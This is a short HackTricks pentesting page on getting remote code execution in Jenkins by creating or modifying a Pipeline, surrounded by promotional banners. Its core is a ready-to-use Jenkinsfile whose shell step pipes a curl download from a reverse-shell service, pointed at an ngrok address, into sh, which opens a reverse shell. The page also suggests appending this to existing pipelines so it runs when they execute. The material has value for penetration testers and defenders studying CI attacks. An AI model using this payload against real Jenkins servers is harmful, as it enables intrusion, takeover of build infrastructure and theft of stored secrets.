Comment on page

Jenkins RCE Creating/Modifying Pipeline

Support HackTricks and get benefits!
If you want to see your company advertised in HackTricks or if you want access to the latest version of the PEASS or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag​
Discover The PEASS Family, our collection of exclusive NFTs​
Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦 @carlospolopm.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Creating a new Pipeline
In "New Item" (accessible in /view/all/newJob) select Pipeline:
In the Pipeline section write the reverse shell:
pipeline {
    agent any
​
    stages {
        stage('Hello') {
            steps {
                sh '''
                    curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
                '''
            }
        }
    }
}
Finally click on Save, and Build Now and the pipeline will be executed:
Modifying a Pipeline
If you can access the configuration file of some pipeline configured you could just modify it appending your reverse shell and then execute it or wait until it gets executed.
Support HackTricks and get benefits!
If you want to see your company advertised in HackTricks or if you want access to the latest version of the PEASS or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag​
Discover The PEASS Family, our collection of exclusive NFTs​
Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦 @carlospolopm.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Jenkins RCE Creating/Modifying Project

Jenkins Dumping Secrets from Groovy

Last modified 1yr ago